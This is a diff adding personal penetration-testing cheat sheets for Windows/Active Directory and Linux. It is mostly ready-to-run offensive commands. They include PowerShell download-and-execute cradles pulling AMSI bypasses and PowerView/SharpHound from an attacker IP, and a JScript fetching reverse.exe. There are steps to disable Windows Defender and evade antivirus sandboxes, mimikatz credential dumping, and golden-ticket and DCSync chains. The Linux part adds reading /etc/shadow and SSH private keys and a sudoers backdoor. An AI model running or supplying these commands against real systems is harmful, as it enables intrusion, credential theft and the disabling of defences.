696	+	gcc shell.c -o shell
697	+	chmod u+s shell
698	+	```
699	+
700	+	Now from inside a SSH session on the victim machine (in this example `192.168.42.32`):
701	+
702	+	```
703	+	bash-4.2$ cd /srv/pelota
704	+	bash-4.2$ ./shell
705	+	bash-4.2# id
706	+	uid=0(root) gid=0(root) groups=0(root),1000(megumin) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
707	+	```
708	+
709	+	### Good to know (either Windows and/or Linux) <a href="#good-to-know-either-windows-andor-linux" id="good-to-know-either-windows-andor-linux"></a>
710	+
711	+	#### Arch cross compile exploit (and diff glibc version) <a href="#arch-cross-compile-exploit-and-diff-glibc-version" id="arch-cross-compile-exploit-and-diff-glibc-version"></a>
712	+
713	+	```
714	+	gcc -m32 -Wall -Wl,--hash-style=both -o gimme.o gimme.c
715	+	```
716	+
717	+	#### IP restriction at application level, bypass <a href="#ip-restriction-at-application-level-bypass" id="ip-restriction-at-application-level-bypass"></a>
718	+
719	+	Try to send a request modifying the HTTP header by adding:
720	+
721	+	```
722	+	X-Forwarder-For: <ip allowed>
723	+	```
724	+
725	+	#### Windows - check OS information <a href="#windows---check-os-information" id="windows---check-os-information"></a>
726	+
727	+	#### Windows - check architecture <a href="#windows---check-architecture" id="windows---check-architecture"></a>
728	+
729	+	```
730	+	wmic os get osarchitecture
731	+	echo %PROCESSOR_ARCHITECTURE%
732	+	```
733	+
734	+	#### Powershell running as 32 or 64 bits <a href="#powershell--running-as-32-or-64-bits" id="powershell--running-as-32-or-64-bits"></a>
735	+
736	+	```
737	+	[Environment]::Is64BitProcess
738	+	```
739	+
740	+	#### Linux LFI - intesresting files to look after <a href="#linux-lfi---intesresting-files-to-look-after" id="linux-lfi---intesresting-files-to-look-after"></a>
741	+
742	+	```
743	+	/proc/self/status
744	+	/proc/self/environ
745	+	/etc/passwd
746	+	/etc/hosts
747	+	/etc/exports
748	+	```
749	+
750	+	#### Windows LFI - intesresting files to look after <a href="#windows-lfi---intesresting-files-to-look-after" id="windows-lfi---intesresting-files-to-look-after"></a>
751	+
752	+	```
753	+	C:/Users/Administrator/NTUser.dat
754	+	C:/Documents and Settings/Administrator/NTUser.dat
755	+	C:/apache/logs/access.log
756	+	C:/apache/logs/error.log
757	+	C:/apache/php/php.ini
758	+	C:/boot.ini
759	+	C:/inetpub/wwwroot/global.asa
760	+	C:/MySQL/data/hostname.err
761	+	C:/MySQL/data/mysql.err
762	+	C:/MySQL/data/mysql.log
763	+	C:/MySQL/my.cnf
764	+	C:/MySQL/my.ini
765	+	C:/php4/php.ini
766	+	C:/php5/php.ini
767	+	C:/php/php.ini
768	+	C:/Program Files/Apache Group/Apache2/conf/httpd.conf
769	+	C:/Program Files/Apache Group/Apache/conf/httpd.conf
770	+	C:/Program Files/Apache Group/Apache/logs/access.log
771	+	C:/Program Files/Apache Group/Apache/logs/error.log
772	+	C:/Program Files/FileZilla Server/FileZilla Server.xml
773	+	C:/Program Files/MySQL/data/hostname.err
774	+	C:/Program Files/MySQL/data/mysql-bin.log
775	+	C:/Program Files/MySQL/data/mysql.err
776	+	C:/Program Files/MySQL/data/mysql.log
777	+	C:/Program Files/MySQL/my.ini
778	+	C:/Program Files/MySQL/my.cnf
779	+	C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
780	+	C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
781	+	C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
782	+	C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
783	+	C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
784	+	C:/Program Files/MySQL/MySQL Server 5.0/my.ini
785	+	C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
786	+	C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
787	+	C:/Program Files (x86)/Apache Group/Apache/conf/access.log
788	+	C:/Program Files (x86)/Apache Group/Apache/conf/error.log
789	+	C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml
790	+	C:/Program Files (x86)/xampp/apache/conf/httpd.conf
791	+	C:/WINDOWS/php.ini C:/WINDOWS/Repair/SAM
792	+	C:/Windows/repair/system C:/Windows/repair/software
793	+	C:/Windows/repair/security
794	+	C:/WINDOWS/System32/drivers/etc/hosts
795	+	C:/Windows/win.ini
796	+	C:/WINNT/php.ini
797	+	C:/WINNT/win.ini
798	+	C:/xampp/apache/bin/php.ini
799	+	C:/xampp/apache/logs/access.log
800	+	C:/xampp/apache/logs/error.log
801	+	C:/Windows/Panther/Unattend/Unattended.xml
802	+	C:/Windows/Panther/Unattended.xml
803	+	C:/Windows/debug/NetSetup.log
804	+	C:/Windows/system32/config/AppEvent.Evt
805	+	C:/Windows/system32/config/SecEvent.Evt
806	+	C:/Windows/system32/config/default.sav
807	+	C:/Windows/system32/config/security.sav
808	+	C:/Windows/system32/config/software.sav
809	+	C:/Windows/system32/config/system.sav
810	+	C:/Windows/system32/config/regback/default
811	+	C:/Windows/system32/config/regback/sam
812	+	C:/Windows/system32/config/regback/security
813	+	C:/Windows/system32/config/regback/system
814	+	C:/Windows/system32/config/regback/software
815	+	C:/Program Files/MySQL/MySQL Server 5.1/my.ini
816	+	C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
817	+	C:/Windows/System32/inetsrv/config/applicationHost.config
818	+	C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
819	+	```
820	+
821	+	#### Enable execution of PowerShell Scripts <a href="#enable-execution-of-powershell-scripts" id="enable-execution-of-powershell-scripts"></a>
822	+
823	+	```
824	+	Set-ExecutionPolicy RemoteSigned
825	+	Set-ExecutionPolicy Unrestricted
826	+	powershell.exe -exec bypass
827	+	```
828	+
829	+	#### Encode Powershell b64 from Linux <a href="#encode-powershell-b64-from-linux" id="encode-powershell-b64-from-linux"></a>
830	+
831	+	```
832	+	echo 'ImAnEviCradleBuuhhhh' \| iconv -t UTF-16LE \| base64 -w0
833	+	```
834	+
835	+	#### Encode/Decode b64 in Windows WITHOUT Powershell <a href="#encodedecode-b64-in-windows-without-powershell" id="encodedecode-b64-in-windows-without-powershell"></a>
836	+
837	+	```
838	+	certutil -encode <inputfile> <outputfile>
839	+	certutil -decode <b64inputfile> <plainoutputdecodedfile>
840	+	^-- If the file exists I can use the -f flag which will force an overwrite
841	+	```
842	+
843	+	#### Check the Type of Language available with Powershell <a href="#check-the-type-of-language-available-with-powershell" id="check-the-type-of-language-available-with-powershell"></a>
844	+
845	+	```
846	+	$ExecutionContext.SessionState.LanguageMode
847	+
848	+	Possible types are:
849	+	- Full Language
850	+	- RestrictedLanguage
851	+	- No Language
852	+	- Constrained Language
853	+	```
854	+
855	+	#### Set Proxy in code used (Windows) <a href="#set-proxy-in-code-used-windows" id="set-proxy-in-code-used-windows"></a>
856	+
857	+	Powershell
858	+
859	+	```
860	+	[System.Net.WebRequest]::DefaultWebProxy.GetProxy(url)
861	+	```
862	+
863	+	JScript
864	+
865	+	```
866	+	var url = "http://192.168.42.43/reverse.exe";
867	+	var var Object = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");
868	+	Object.setProxy("2","192.168.42.42:3128");
869	+	Object.open('GET', url, false);
870	+	Object.send();
871	+	^-- This was tricky because lack of debug information. The parameter in "2" means "SXH_PROXY_SET_PROXY", and it allows to specify a list of one or more servers together with a bypass list. The .open() must be in lowercase otherwise .Open() is another method
872	+	```
873	+
874	+	#### Hide Foreground with WMI (Windows, Office Macros) <a href="#hide-foreground-with-wmi-windows-office-macros" id="hide-foreground-with-wmi-windows-office-macros"></a>
875	+
876	+	```
877	+	Sub example()
878	+	Const HIDDEN_WINDOW = 0
879	+	Dim cmd As String
880	+
881	+	cmd = "Here there is some commands to execute inside the macro via WMI"
882	+	Set objWMIService = GetObject("winmgmts:")
883	+	Set objStartup = objWMIService.Get("Win32_ProcessStartup")
884	+	Set objConfig = objStartup.SpawnInstance_
885	+	objConfig.ShowWindow = HIDDEN_WINDOW
886	+	Set objProcess = GetObject("winmgmts:Win32_Process")
887	+	errReturn = objProcess.Create(str, Null, objConfig, pid)
888	+	End Sub
889	+	```
890	+
891	+	### Simple Buffer Overflow (32 bits, NO ASLR and NO DEP) <a href="#simple-buffer-overflow-32-bits-no-aslr-and-no-dep" id="simple-buffer-overflow-32-bits-no-aslr-and-no-dep"></a>
892	+
893	+	#### Summarized steps <a href="#summarized-steps" id="summarized-steps"></a>
894	+
895	+	* 0 - Crash the application
896	+	* 1 - Fuzzing (find aprox number of bytes where the crash took place)
897	+	* 2 - Find offset
898	+	* 3 - EIP control
899	+	* 4 - Check for enough space on buffer
900	+	* 5 - Badchars counting
901	+	* 6 - Find return address (JMP ESP)
902	+	* 7 - Create payload
903	+
904	+	#### Fuzzing: example with vulnserver + spike on TRUN command <a href="#fuzzing-example-with-vulnserver--spike-on-trun-command" id="fuzzing-example-with-vulnserver--spike-on-trun-command"></a>
905	+
906	+	```
907	+	cat > trun.spk <<EOF
908	+	s_readline();
909	+	s_string("TRUN ");
910	+	s_string_variable("COMMAND");
911	+	EOF
912	+	```
913	+
914	+	Now, start wireshark filtering on the target IP/PORT below and run the `trun.spk`:
915	+
916	+	```
917	+	generic_send_tcp 172.16.42.131 9999 trun.spk 0 0
918	+	```
919	+
920	+	Once a crash takes place, go to wireshark to locate the crash.
921	+
922	+	#### Badchars <a href="#badchars" id="badchars"></a>
923	+
924	+	From the block below, the next ones were not included (most common badchars):
925	+
926	+	```
927	+	\x00 --> null byte
928	+	\x0a --> new line character (AKA "\n")
929	+	```
930	+
931	+	So…actual list of badchars:
932	+
933	+	```
934	+	\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
935	+	```
936	+
937	+	#### Usefull tools (on Kali Linux) <a href="#usefull-tools-on-kali-linux" id="usefull-tools-on-kali-linux"></a>
938	+
939	+	create\_pattern
940	+
941	+	```
942	+	/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
943	+	/usr/bin/msf-pattern_create
944	+	```
945	+
946	+	pattern\_offset
947	+
948	+	```
949	+	/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb
950	+	/usr/bin/msf-pattern_offset
951	+	```
952	+
953	+	nasm\_shell
954	+
955	+	```
956	+	/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
957	+	/usr/bin/msf-nasm_shell
958	+	```
959	+
960	+	msfvenom
961	+
962	+	```
963	+	/usr/share/metasploit-framework/msfvenom
964	+	/usr/bin/msfvenom
965	+	```
966	+
967	+	#### Shellcode POC: calc.exe <a href="#shellcode-poc-calcexe" id="shellcode-poc-calcexe"></a>
968	+
969	+	```
970	+	msfvenom -p windows/exec -b '\x00\x0A' -f python --var-name buffer CMD=calc.exe EXITFUNC=thread
971	+	```
972	+
973	+	### Antivirus Bypass <a href="#antivirus-bypass" id="antivirus-bypass"></a>
974	+
975	+	Antivirus tend to flag malware by Signature/Heuristics detection, we could bypass these throughout certain techniques For more details, look up into the \[Exploit Development/Reversing/AV\|EDR Bypass]\([https://ceso.github.io/2020/12/hacking-resources/#exploit-developmentreversingAV](https://ceso.github.io/2020/12/hacking-resources/#exploit-developmentreversingAV)\|EDR Bypass) Section on the resources part of my blog.
976	+
977	+	#### Signature Bypass <a href="#signature-bypass" id="signature-bypass"></a>
978	+
979	+	For example, we can obfuscate the code ciphering and/or encoding (having a decipher/decoding routine in the code), as also leverage tools dedicated for this purpose. Another thing is to use NOT common name for functions, variable names, etc; lunfardos, slang, idioisms, weird words from the dictionary, etc.
980	+
981	+	#### Heuristics Bypass <a href="#heuristics-bypass" id="heuristics-bypass"></a>
982	+
983	+	As for the heuristics for example AV’s tend to execute the malware inside a sandbox, we could have code for detecting if running inside a sandbox and exit if this is true. I could use the following techniques:
984	+
985	+	* Sleep command and comparision of how real time has passed (AV’s could NOT wait until the sleep and just fast-forward the time)
986	+	* A counter up to 1 billon (Same story than Sleep, could not wait until it finishes and just exits)
987	+	* Call Windows API’s poor or not even documented (as AV’s tend to emulate API’s inside the sandboxes, but some of them will not, then at the malware trying to call it and not existing, it will be detected is running inside a Sandbox)
988	+	* Verifying the name of the malware (AV’s could rename the file, if it has changed it might be running inside a sandbox)
989	+	* Veifying if I can allocate TOO MUCH memory
990	+	* Checking if a known user in the system exists, if it doesn’t exit
991	+
992	+	#### If NOT AV Bypass and Admin, DISABLE Defender <a href="#if-not-av-bypass-and-admin-disable-defender" id="if-not-av-bypass-and-admin-disable-defender"></a>
993	+
994	+	If we have admin creds, we could disable Win Defender, please note THIS IS NEVER a good idea in production environments as this can be monitored!!
995	+
996	+	```
997	+	# Query if there is already an excluded path
998	+	Get-MpPreference \| select-object -ExpandProperty ExclusionPath
999	+	# Disable real time monitoring
1000	+	Set-MpPreference -DisableRealtimeMonitoring $true
1001	+	# Exclude temp dir from monitoring by defender
1002	+	Add-MpPreference -ExclusionPath "C:\windows\temp"
1003	+	# Disable Defender ONLY for downloaded files
1004	+	Set-MpPreference -DisableIOAVProtection $true
1005	+	# Or REMOVE ALL Signature's but leave it enabled
1006	+	"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
1007	+	```
1008	+
1009	+	#### AMSI Bypass <a href="#amsi-bypass" id="amsi-bypass"></a>
1010	+
1011	+	AMSI (Anti-Malware Scan Interface), in short sit’s between Powershell and Defender, so even if our crafted malware/tools have an AV Bypass, it still can be flagged by AMSI (annoying!), AMSI can also be leveraged for example for EDR’s. There are certain ways to bypass AMSI, for example forcing it to fail.
1012	+
1013	+	IT’S RECOMMENDED TO ALWAYS HAVE AN AMSI BYPASS BEFORE EXECUTING POWERSHELL PAYLOAD!
1014	+
1015	+	### Active Directory <a href="#active-directory" id="active-directory"></a>
1016	+
1017	+	#### Permissions: ACE (Access Control Enties) SDDL (Security Descriptor Definition Language) - Format <a href="#permissions-ace-access-control-enties-sddl-security-descriptor-definition-language---format" id="permissions-ace-access-control-enties-sddl-security-descriptor-definition-language---format"></a>
1018	+
1019	+	```
1020	+	ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
1021	+
1022	+	--> ace_type: defines allow/deny/audit
1023	+	--> ace_flags: inheritance objects
1024	+	--> rights: incremental list with given permissions (allowed/audited/denied), incrmentalas ARE NOT the only ones
1025	+	--> object_guid and inherit_object: Allows to apply an ACE on a specified objects by GUID values. GUID is an object class, attribute, set or extended right, if pressent limits the ACE's to the object the GUID represents. Inherited GUID represents an object class, if present will limit the inheritance of ACE's to the child enties only of that object
1026	+	--> account_sid: SID of the object the ACE is applying, is the SID of the user or group to the one permissions are being assigned, sometimes there are acronyms of well known SID's instead of numerical ones
1027	+	```
1028	+
1029	+	#### BloodHound <a href="#bloodhound" id="bloodhound"></a>
1030	+
1031	+	```
1032	+	$attacker="192.168.42.37";$domain="example.com";IEX(New-Object Net.Webclient).downloadString("http://$attacker/4msibyp455.ps1");IEX(New-Object Net.Webclient).downloadString("http://$attacker/SharpHound.ps1");Invoke-BloodHound -CollectionMethod All,GPOLocalGroup,LoggedOn -Domain $domain
1033	+	```
1034	+
1035	+	#### PowerView methods for enumeration <a href="#powerview-methods-for-enumeration" id="powerview-methods-for-enumeration"></a>
1036	+
1037	+	This is the command for download injected into memory with an AMSI Bypass before
1038	+
1039	+	```
1040	+	$user="userNameHereIfQueryUsesIt";$attacker="192.168.49.107";$dominio="example.com";IEX(New-Object Net.Webclient).downloadString("http://$attacker/nieri.ps1");IEX(New-Object Net.Webclient).downloadString("http://$attacker/PowerView.ps1");OneOfThePowerViewCmdsFromBelowHere
1041	+	```
1042	+
1043	+	ACLs
1044	+
1045	+	```
1046	+	Get-ObjectAcl -Identity ceso <-- Get all the objects and acls the given user has
1047	+	```
1048	+
1049	+	Users
1050	+
1051	+	```
1052	+	Get-DomainUser \| Get-ObjectAcl -ResolveGUIDs \| ForEach-Object {$_ \| Add-Member -NoteProperty Name Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} \| ForEach-Object {if ( $_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}} <-- Maps all users in the domain into a table replacing the SID for the name
1053	+
1054	+	Get-DomainUser -Domain example.com <-- Enumeration truncated only to the users in the given domain
1055	+
1056	+	Get-DomainUser -TrustedToAut <-- List all the SPN's which have Constrained Delegation
1057	+	```
1058	+
1059	+	Groups
1060	+
1061	+	```
1062	+	Get-DomainGroup \| Get-ObjectAcl -ResolveGUIDs \| ForEach-Object {$_ \| Add-Member -NoteP ropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} \| ForEach-Objec t {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}} <-- Maps all groups in the domain into a table replacing the SID for the name
1063	+
1064	+	Get-DomainGroup -Domain example.com <-- Enumeration truncated only to the users in the given domain
1065	+
1066	+	Get-DomainGroupMember "Enterprise Admins" -Domain example.com <-- Get ALL the members of the group "Enterprise Admins" inside the example.com domain
1067	+
1068	+	Get-DomainForeignGroupMember -Domain example2.com <-- Enumerate groups in a trusted forest or domain which contains NON-NATIVE members
1069	+	```
1070	+
1071	+	Computers
1072	+
1073	+	```
1074	+	Get-DomainComputer \| Get-ObjectAcl -ResolveGUIDs \| Foreach-Object {$_ \| Add-Member -NotePropertyName Identit y -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} \| Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}} <-- Enumerate computers accounts in the domain
1075	+
1076	+	Get-DomainComputer -Unconstrained <-- Enumerate unconstrained computers
1077	+
1078	+	Get-DomainComputer -Identity cesoComputer <-- Verify that cesoComputer exists
1079	+	```
1080	+
1081	+	Trusts
1082	+
1083	+	```
1084	+	Get-DomainTrust <-- Enumerate trusts by making an LDAP query, this works by the DC creating a Trusted Domain Object (TDO)
1085	+
1086	+	Get-DomainTrust -API <-- Enumerate trusts by using Win32 API DsEnumerateDomainTrusts
1087	+	^-- If I add the -domain flag, it will enumerate all the found in the domain
1088	+
1089	+	Get-DomainTrustMapping <-- Automate the process of enumeration for all forest trust and their child domains trust
1090	+	```
1091	+
1092	+	SID’s
1093	+
1094	+	```
1095	+	Get-DomainSID <-- Get the SID of the current domain
1096	+	Get-DomainSID -Domain example.com <-- Get the SID of example.com
1097	+	```
1098	+
1099	+	#### Exploitation <a href="#exploitation" id="exploitation"></a>
1100	+
1101	+	List all available credentials cached (Hashes and Passwords; Logged on user and computer)
1102	+
1103	+	```
1104	+	mimikatz.exe "sekurlsa::logonpasswords" exit
1105	+	```
1106	+
1107	+	Convert to ccache
1108	+
1109	+	We can use the tool `ticket_converter` written by `zer1t0` for converting kirbi tickets to ccache and viceversa:
1110	+
1111	+	```
1112	+	Convert from b64 encoded blob to kirbi:
1113	+	[IO.File]::WriteAllBytes("C:\fullpathtoticket.kirbi", [Convert]::FromBase64String("aa…"))
1114	+	Convert the .kiribi to .ccache:
1115	+	python ticket_converter.py ticket.ccache ticket.kirbi
1116	+	Copy the ccache to our attacker machine and export the KRB5CCNAME variable:
1117	+	export KRB5CCNAME=/path/to/ticket.ccache
1118	+	```
1119	+
1120	+	GenericAll
1121	+
1122	+	GenericWrite
1123	+
1124	+	WriteDACL
1125	+
1126	+	Unconstrained Delegation
1127	+
1128	+	We have local adminstrative access to a host which is configured for Kerberos Unconstrained Delegation. We can leverage Rubeus for an auth from the DC and then steal the TGT, this can be used to perform a DCSync to obtain the NTLM hash for ANY account. Other way is by triggering the printer bug on a domain controller to coerce to authenticate to the host compromised we have using it’s machine account.
1129	+
1130	+	If a computer account has `TRUSTED_FOR_DELEGATION` in it’s UserAccountControl (UAC), then it’s a viable target. Domain controllers will also have `SERVER_TRUST_ACCOUNT_UAC`, so…if it the machine has this, then it’s a DC.
1131	+
1132	+	By Forwardable TGT after login
1133	+
1134	+	```
1135	+	1 - Enumerate if there if there is unconstrained delegation
1136	+	2 - If there is, open mimikatz (commands blow are inside it)
1137	+	3 - privilege::debug <-- Enable debug
1138	+	4 - sekurlsa::tickets <-- List all the present tickets
1139	+	5 - Through phishing or visit of a page, if the user has Windows Auth then it will use kerberos
1140	+	6 - sekurlsa::tickets <-- Verify if there are new TGT's
1141	+	7 - sekurlsa::tickets /export <-- If new TGT and marked as forwardable export them to disk
1142	+	8 - kerberos::ptt /inject:<some-exported-tkt-file.kirbi> <-- Inject the exported ticket into memory
1143	+	9 - C:\Windows\Temp\PsExec.exe \\example.com cmd <-- Try to get a cmd shell in example.com by leveraging injected ticket
1144	+
1145	+	* By default every user allows their TGT to be delegated, but high privilege users can be added to the group "Protected Users Group" to disable it, it also can break the application for which at the beggining unconstrained delegation was enabled for those users
1146	+	```
1147	+
1148	+	By using of SpoolSample.exe (printer bug)
1149	+
1150	+	```
1151	+	1 - Download and compile SpoolSample in a dev machine, it can be downloaded from: https://github.com/leechristensen/SpoolSample
1152	+	2 - Download and compile Rubeus in a dev machine, it can be downloaded from: https://github.com/GhostPack/Rubeus
1153	+	3 - Find a way to upload SpoolSample and Rubeus without being detected (for example, disabling Windows Defender, or injecting them into memory through reflection for example), for ease of the technique, all below is just written to disk
1154	+	4 - Rubeus.exe monitor /interval:5 /filteruser:DC01$ <-- Monitor for TGTs originated in the DC01 machine. THIS MUST BE RUN FROM A DIFFERENT SHELL THAN THE ONE USED FOR THE NEXT STEP
1155	+	5 - SpoolSample.exe DC01 VICTIM01 <-- Leverage "RpcOpenPrinter" and "RpcRemoteFindFirstPrinterChangeNotification" to get a notif
1156	+	6 - Rubeus.exe ptt /ticket:<b64-from-rubeus-monitor> <-- Inject into memory the b64 ticket obtained by monitoring for tickets from DC01 to VICTIM01
1157	+	7 - lsadump::dcsync /domain:example.com /user:example\krbtgt <-- Dump the NTLM hash of the krbtgt user by leveraging the just injected ticket (It could also be possible to dump the hash of the pass of a member from the "Domain Admins" group). THIS IS RUN FROM INSIDE MIMIKATZ
1158	+	8 - kerberos::golden /user:krbtgt /domain:example.com /sid:<sid-showed-in-dcsync or obtained by PowerView> /rc4:<ntlm-hash-dumped-with-dcsync> /ptt <-- Craft a golden ticket and inject it into memory
1159	+	9 - dir \\dc01\\c$ <-- Verify read access on dc01
1160	+	10 - misc::cmd <-- Open cmd prompt from inside Mimikatz
1161	+	11 - C:\Windows\Temp\PsExec.exe -accepteula \\dc01 cmd <-- Get a shell on dc01 by leveraging the golden ticket injected
1162	+	```
1163	+

■ ■ ■ ■ ■ ■

cheat-sheets/linux-cheatsheet.md

1	+	# Linux-Cheatsheet
2	+
3	+	A place for me to store my notes/tricks for Linux Based Systems
4	+
5	+	Note: These notes are heavily based off other articles, cheat sheets and guides etc. I just wanted a central place to store the best ones.
6	+
7	+	Reference: [https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html](https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html)
8	+
9	+	Also this will probably be a lot smaller than my Windows Cheat sheet because I hate Linux.
10	+
11	+	### Enumeration
12	+
13	+	Basics
14	+
15	+	```
16	+	whoami
17	+	hostname
18	+	uname -a
19	+	cat /etc/password
20	+	cat /etc/shadow
21	+	groups
22	+	ifconfig
23	+	netstat -an
24	+	ps aux \| grep root
25	+	uname -a
26	+	env
27	+	id
28	+	cat /proc/version
29	+	cat /etc/issue
30	+	cat /etc/passwd
31	+	cat /etc/group
32	+	cat /etc/shadow
33	+	cat /etc/hosts
34	+	```
35	+
36	+	Recon
37	+
38	+	```
39	+	Always start with a stealthy scan to avoid closing ports.
40	+
41	+	# Syn-scan
42	+	nmap -sS INSERTIPADDRESS
43	+
44	+	# Scan all TCP Ports
45	+	nmap INSERTIPADDRESS -p-
46	+
47	+	# Service-version, default scripts, OS:
48	+	nmap INSERTIPADDRESS -sV -sC -O -p 111,222,333
49	+
50	+	# Scan for UDP
51	+	nmap INSERTIPADDRESS -sU
52	+
53	+	# Connect to udp if one is open
54	+	nc -u INSERTIPADDRESS 48772
55	+
56	+	```
57	+
58	+	UDP Scan
59	+
60	+	```
61	+	./udpprotocolscanner <ip>
62	+	```
63	+
64	+	FTP Enum
65	+
66	+	```
67	+	nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS
68	+	```
69	+
70	+	Start Web Server
71	+
72	+	```
73	+	python -m SimpleHTTPServer 80
74	+	```
75	+
76	+	### Exploit
77	+
78	+	libSSH Authentication Bypass - CVE-2018-10933
79	+
80	+	```
81	+	https://github.com/blacknbunny/libSSH-Authentication-Bypass
82	+
83	+	Use nc <ip> 22 to banner grab the SSH Service, if it's running vulnerable version of libSSH then you can bypass
84	+	```
85	+
86	+	### Privilege Escalation
87	+
88	+	Basics
89	+
90	+	```
91	+	cat /proc/version <- Check for kernel exploits
92	+	ps auxww
93	+	ps -ef
94	+	lsof -i
95	+	netstat -laputen
96	+	arp -e
97	+	route
98	+	cat /sbin/ifconfig -a
99	+	cat /etc/network/interfaces
100	+	cat /etc/sysconfig/network
101	+	cat /etc/resolv.conf
102	+	cat /etc/sysconfig/network
103	+	cat /etc/networks
104	+	iptables -L
105	+	hostname
106	+	dnsdomainname
107	+	cat /etc/issue
108	+	cat /etc/*-release
109	+	cat /proc/version
110	+	uname -a
111	+	rpm -q kernel
112	+	dmesg \| grep Linux
113	+	ls /boot \| grep vmlinuz-
114	+	lsb_release -a
115	+	```
116	+
117	+	Run pspy64
118	+
119	+	```
120	+	#https://github.com/DominicBreuker/pspy
121	+
122	+	Run in background and watch for any processes running
123	+	```
124	+
125	+	Spawn TTY
126	+
127	+	```
128	+	#https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
129	+
130	+	python -c 'import pty; pty.spawn("/bin/sh")'
131	+	echo os.system('/bin/bash')
132	+	awk 'BEGIN {system("/bin/sh")}'
133	+	find / -name blahblah 'exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
134	+	python: exit_code = os.system('/bin/sh') output = os.popen('/bin/sh').read()
135	+	perl -e 'exec "/bin/sh";'
136	+	perl: exec "/bin/sh";
137	+	ruby: exec "/bin/sh"
138	+	lua: os.execute('/bin/sh')
139	+	irb(main:001:0> exec "/bin/sh"
140	+	Can also use socat
141	+	```
142	+
143	+	Enum Scripts
144	+
145	+	```
146	+	cd /EscalationServer/
147	+	chmod u+x linux_enum.sh
148	+	chmod 700 linuxenum.py
149	+
150	+	./linux_enum.sh
151	+	python linuxenum.py
152	+	```
153	+
154	+	Add User to Sudoers
155	+
156	+	```
157	+	echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers
158	+	```
159	+
160	+	List CronJobs
161	+
162	+	```
163	+	crontab -l
164	+	ls -alh /var/spool/cron
165	+	ls -al /etc/ \| grep cron
166	+	ls -al /etc/cron*
167	+	cat /etc/cron*
168	+	cat /etc/at.allow
169	+	cat /etc/at.deny
170	+	cat /etc/cron.allow
171	+	cat /etc/cron.deny
172	+	cat /etc/crontab
173	+	cat /etc/anacrontab
174	+	cat /var/spool/cron/crontabs/root
175	+	```
176	+
177	+	Check for SSH Readable SSH Keys for Persistence and Elevation
178	+
179	+	```
180	+	cat ~/.ssh/authorized_keys
181	+	cat ~/.ssh/identity.pub
182	+	cat ~/.ssh/identity
183	+	cat ~/.ssh/id_rsa.pub
184	+	cat ~/.ssh/id_rsa
185	+	cat ~/.ssh/id_dsa.pub
186	+	cat ~/.ssh/id_dsa
187	+	cat /etc/ssh/ssh_config
188	+	cat /etc/ssh/sshd_config
189	+	cat /etc/ssh/ssh_host_dsa_key.pub
190	+	cat /etc/ssh/ssh_host_dsa_key
191	+	cat /etc/ssh/ssh_host_rsa_key.pub
192	+	cat /etc/ssh/ssh_host_rsa_key
193	+	cat /etc/ssh/ssh_host_key.pub
194	+	cat /etc/ssh/ssh_host_key
195	+	```
196	+
197	+	Startup Scripts
198	+
199	+	```
200	+	find / -perm -o+w -type f 2>/dev/null \| grep -v '/proc\\|/dev'
201	+	```
202	+
